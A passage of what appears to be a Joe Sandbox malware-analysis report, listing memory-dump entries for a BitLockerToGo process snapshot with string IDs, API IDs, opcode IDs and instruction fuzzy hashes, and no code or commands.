                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 2=G
                                                                              • API String ID: 0-1526625377
                                                                              • Opcode ID: 606e8d2a0ab9efd6dec3864a182ac106b258ebaa3b31ddf875d9a24f4df801d0
                                                                              • Instruction ID: da55c47143f3f70a42458ec4598511e62ce723d3d18be4e5721483a0905986b0
                                                                              • Opcode Fuzzy Hash: 606e8d2a0ab9efd6dec3864a182ac106b258ebaa3b31ddf875d9a24f4df801d0
                                                                              • Instruction Fuzzy Hash: FB6135726083409FE724CF24DC46BDFB7E4EBD5308F04483EE9989B281D774950A8B96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "NF
                                                                              • API String ID: 0-902679986
                                                                              • Opcode ID: 3a23bccb56e9e6c4b8018378dd6e46d72064aa5d52197bc03e97fcc8a38beef0
                                                                              • Instruction ID: 388f97be088af2a149fb697d5729ccf0d03740bfbb41f133c5a93223da2c456f
                                                                              • Opcode Fuzzy Hash: 3a23bccb56e9e6c4b8018378dd6e46d72064aa5d52197bc03e97fcc8a38beef0
                                                                              • Instruction Fuzzy Hash: 83514775A00205CFDF08CF68DC516BE73B2FB99316F18847EE542A7294E738AA11CB94
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: d
                                                                              • API String ID: 0-2564639436
                                                                              • Opcode ID: 43423378ca69cc9288430fd9d8a80c82f40022ce69522238eee6dfe8b8722f48
                                                                              • Instruction ID: 579aeb4980f0bfb9e130ab4e3fcda0da581b192581c07440a8bb19098b3ac78d
                                                                              • Opcode Fuzzy Hash: 43423378ca69cc9288430fd9d8a80c82f40022ce69522238eee6dfe8b8722f48
                                                                              • Instruction Fuzzy Hash: 195148227696904BD338A93C5C5127E7A930BD2334F2DCB7FE5F18B3E5D5A9480A8315
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kl
                                                                              • API String ID: 0-2211745248
                                                                              • Opcode ID: dc0d4d5ba0b28efc5eae71535fa4b2ee82578983648a3b763f7d6862cb37d8b5
                                                                              • Instruction ID: ec0d56bfe195a417652aab9fb53839f9f64348a20f40dad980aa13a10ef0974e
                                                                              • Opcode Fuzzy Hash: dc0d4d5ba0b28efc5eae71535fa4b2ee82578983648a3b763f7d6862cb37d8b5
                                                                              • Instruction Fuzzy Hash: 5D4124B59093018BD3209F59C88276BB3F1FFC5314F15892EE9994B391FB789905C74A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 2=G
                                                                              • API String ID: 0-1526625377
                                                                              • Opcode ID: 921aaf6dc8f8f0023e8fa56dcfb8cf1178b3ecc3ce4a06c221b7605c57bd5d1c
                                                                              • Instruction ID: a20d484de1f7534fea63233fd4d2bb77d2a0fb82217939c24609da96872e9e0d
                                                                              • Opcode Fuzzy Hash: 921aaf6dc8f8f0023e8fa56dcfb8cf1178b3ecc3ce4a06c221b7605c57bd5d1c
                                                                              • Instruction Fuzzy Hash: E54127712083409FE710CF28EC4279FB7E4EBD5305F05883EF99897291D779990A9B56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4 fg
                                                                              • API String ID: 0-2251411152
                                                                              • Opcode ID: 1f50cd7010000490fdc96b31a8b850f6e635596641f932522b99fa7355fb2cf9
                                                                              • Instruction ID: 0aa6e0a147dde351f158c55a98a1c2b41823db81d86618717cfb7b211c25b14f
                                                                              • Opcode Fuzzy Hash: 1f50cd7010000490fdc96b31a8b850f6e635596641f932522b99fa7355fb2cf9
                                                                              • Instruction Fuzzy Hash: F001F4336562118FC308CF24CC9092AB323BFD9240F1F8D6DC59157212D675E41AC688
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 285064a6bd4250f6abf057f0a403e33f82f68561e16a38f42ce1240f957ed8e8
                                                                              • Instruction ID: f3ffb87e86d34996bae9170fe70bf5ccec96c2bf7c021f70b5bcf28db5dee89c
                                                                              • Opcode Fuzzy Hash: 285064a6bd4250f6abf057f0a403e33f82f68561e16a38f42ce1240f957ed8e8
                                                                              • Instruction Fuzzy Hash: 155206716083459FCB14CF24C0906AABBE1BF89346F188A6EFC9A57342D778D94DCB85
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e4d822e1eb8515c98540bbde6b3fe7bc1e79e47566ff14389d058d305a07fe73
                                                                              • Instruction ID: 4a63811177c5c41e2dd92bcba82e5119659fafefea4a6eaa1cc295fb28c45911
                                                                              • Opcode Fuzzy Hash: e4d822e1eb8515c98540bbde6b3fe7bc1e79e47566ff14389d058d305a07fe73
                                                                              • Instruction Fuzzy Hash: 6502D4B5D002158BCB20CF68C8917ABB7F1FF9A324F15415AE845AB391F3396D05C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4006ee09d1a61692cb83f2cad5713de9625560001c3009694e7511d98c5989ab
                                                                              • Instruction ID: 21644474e1ea197190d23822290b3a69ebfa69cb2c46aafe21a602d1985dac00
                                                                              • Opcode Fuzzy Hash: 4006ee09d1a61692cb83f2cad5713de9625560001c3009694e7511d98c5989ab
                                                                              • Instruction Fuzzy Hash: FE52B3B0908B849FE735CB24C4843A7BBE1AB51315F55882FD9E707783C27DA98D871A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cc61cd3dfb897e8215bfdbd5a37a6c9e1fd871d4b0754f19be743ac64f66a94a
                                                                              • Instruction ID: 450c6402aa5c506a056887709d464eee5f1d304f7bccd18d10e97eea677bab3e
                                                                              • Opcode Fuzzy Hash: cc61cd3dfb897e8215bfdbd5a37a6c9e1fd871d4b0754f19be743ac64f66a94a
                                                                              • Instruction Fuzzy Hash: 6922C5316087118BC725DF18E8806ABB3E1FFC431AF19893ED98697386D738A8598756
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 419a56f930dca4666467c1d431c45fe812816fede641a2345434da0e9fdc9ac6
                                                                              • Instruction ID: 9846729296f0f9fed5b4a851f4e5914364f9eb2194c8c88a211379a52808b66a
                                                                              • Opcode Fuzzy Hash: 419a56f930dca4666467c1d431c45fe812816fede641a2345434da0e9fdc9ac6
                                                                              • Instruction Fuzzy Hash: 78320675604B408FD714DF38C485366BBE1AB55314F198A2ED8EB87392E639F809CB47
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d980f0bd98610e4d8272660670069c7f9cc81199d03276e44bf644db170010b2
                                                                              • Instruction ID: ddbd1301578d768473ec3ca646c02d57d5ea5e18590c1905f307204d9663284c
                                                                              • Opcode Fuzzy Hash: d980f0bd98610e4d8272660670069c7f9cc81199d03276e44bf644db170010b2
                                                                              • Instruction Fuzzy Hash: 71323671914B108FC328CF29C58052AB7F1BF45752B604A2EDA9787F92D33AF949CB18
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0f8efac94917cd77447e8dfe9593aaaf3c7b36b215c94a9f2f29dd1d6d84993
                                                                              • Instruction ID: 0f093964ae74b592f723f992f79af8cf3be110f790fd6c9f93aa59ee46669c6f
                                                                              • Opcode Fuzzy Hash: e0f8efac94917cd77447e8dfe9593aaaf3c7b36b215c94a9f2f29dd1d6d84993
                                                                              • Instruction Fuzzy Hash: 3402F035608311CFCB04EF38E8D066AB7E1FB9A315F1A88BED58687251E735E941CB49
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 40c2f38fc8222979f610f24472fe96420f0f61dedd85b953a3439a25a67a087a
                                                                              • Instruction ID: 4f861b8cf0a160637a9c49dad9862a472887b6ed847ff5d24eab2be97342d1af
                                                                              • Opcode Fuzzy Hash: 40c2f38fc8222979f610f24472fe96420f0f61dedd85b953a3439a25a67a087a
                                                                              • Instruction Fuzzy Hash: 2DE179765087418FD714CF29E89067BB7D2AFE6305F184A6EE0C587352DA388806CBA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e57e904eec1f08fac797be2f0bd1344a0e7e30b8506f8f698f1fa61e07dda006
                                                                              • Instruction ID: e6a1ecca919e3c70d30f5511653764e80b2f409667fb17656bad36c1576a1d5b
                                                                              • Opcode Fuzzy Hash: e57e904eec1f08fac797be2f0bd1344a0e7e30b8506f8f698f1fa61e07dda006
                                                                              • Instruction Fuzzy Hash: 79E1F035718211CFCB04DF38E8D066AB7E2FB9A315F1A88BED58683261D735E845CB49
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8d29df665f12312b8cc617b5bfb3f0015dc74ac8b7e99102309fa20f085b94ca
                                                                              • Instruction ID: a1aaba294233cc4b9eb175d070a76d62343980c9b1f79f68a62eafeaf600d301
                                                                              • Opcode Fuzzy Hash: 8d29df665f12312b8cc617b5bfb3f0015dc74ac8b7e99102309fa20f085b94ca
                                                                              • Instruction Fuzzy Hash: 2AD1F53B628211CBCB18AF38DC9126A73F1FF99755F0B88BED4414B2A4E7398954C715
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5434ebfba671a294963a3f7bceb3c19fe9051a744981fe19bf1b3f8fccd7a8d4
                                                                              • Instruction ID: 345c3de5c179728b40dfc68a3ce4197056e02c51f87368699207bac7403df720
                                                                              • Opcode Fuzzy Hash: 5434ebfba671a294963a3f7bceb3c19fe9051a744981fe19bf1b3f8fccd7a8d4
                                                                              • Instruction Fuzzy Hash: DBF1C3356087418FC724CF29C89176BFBE2AFD9304F08882DE8D587752E679E948CB56
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0df9ad0b670bf84757516bd2133254754294d3bd8caa22bce31a134bc3c4e2bc
                                                                              • Instruction ID: 78bd5dc1c254694dfdf44d8bf6e35c8d256e04b7d2eea8e48aa77936a824bc8e
                                                                              • Opcode Fuzzy Hash: 0df9ad0b670bf84757516bd2133254754294d3bd8caa22bce31a134bc3c4e2bc
                                                                              • Instruction Fuzzy Hash: 7A02DAF1905B40AFC3A1CF3AC942797BEECEB4A260F14491EF4AEC7241D73565058BA6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: af5be24c1a2e8297621e508a97580055c9f9656241941abe8e7d132d48124b44
                                                                              • Instruction ID: a8703c94d9fff6df1a3ee5274742ed6477cb494fadc94c62872dda43e8f37118
                                                                              • Opcode Fuzzy Hash: af5be24c1a2e8297621e508a97580055c9f9656241941abe8e7d132d48124b44
                                                                              • Instruction Fuzzy Hash: CCD116316502059FDB18CF68DC91BFE33B2FB95309F58457ED112DB261EB35A9128B88
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 79d4d169968f695dc456d0b3335d65fdb3f6151547497ae9682c64665e8113e4
                                                                              • Instruction ID: d2c67ced83ef65a46f0bc2dcc45bc83326cce5c3e28c394baa1ed8d3bcda18d9
                                                                              • Opcode Fuzzy Hash: 79d4d169968f695dc456d0b3335d65fdb3f6151547497ae9682c64665e8113e4
                                                                              • Instruction Fuzzy Hash: 1FD1EC716083455BC718CE29C8E026FBBD2ABC1315F18861EF9E6573D6EE3C99098B46
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4292635271bf925e2af90ecbfed0c55d02b8cc83aefc42e02b814d1a054e10ac
                                                                              • Instruction ID: cc52b212c35310c1b9c3ca19effc08cc0d6b428f4fe27ea028eb87b909f6f81b
                                                                              • Opcode Fuzzy Hash: 4292635271bf925e2af90ecbfed0c55d02b8cc83aefc42e02b814d1a054e10ac
                                                                              • Instruction Fuzzy Hash: BBC1D4B6E005158FCB1CCF69D85066EB7B2BB99314F19C17ED81AA7392DB349C02CB84
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 888cee706edf79c4e4d506956589f03659b5e2f23eeb16c0828606ec3ccd9b7d
                                                                              • Instruction ID: 678906fcd53b16e21a9807575729e90702dda5194dd3249971e121fa68697c85
                                                                              • Opcode Fuzzy Hash: 888cee706edf79c4e4d506956589f03659b5e2f23eeb16c0828606ec3ccd9b7d
                                                                              • Instruction Fuzzy Hash: F9A1FF35218211CFCB04EF38E89066AB7E1FF9A315F1A897EE58683351D739E941CB49
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4f97890fe4297331055e40927051cc0301748eb2b94673d72afeb8727c0a31f8
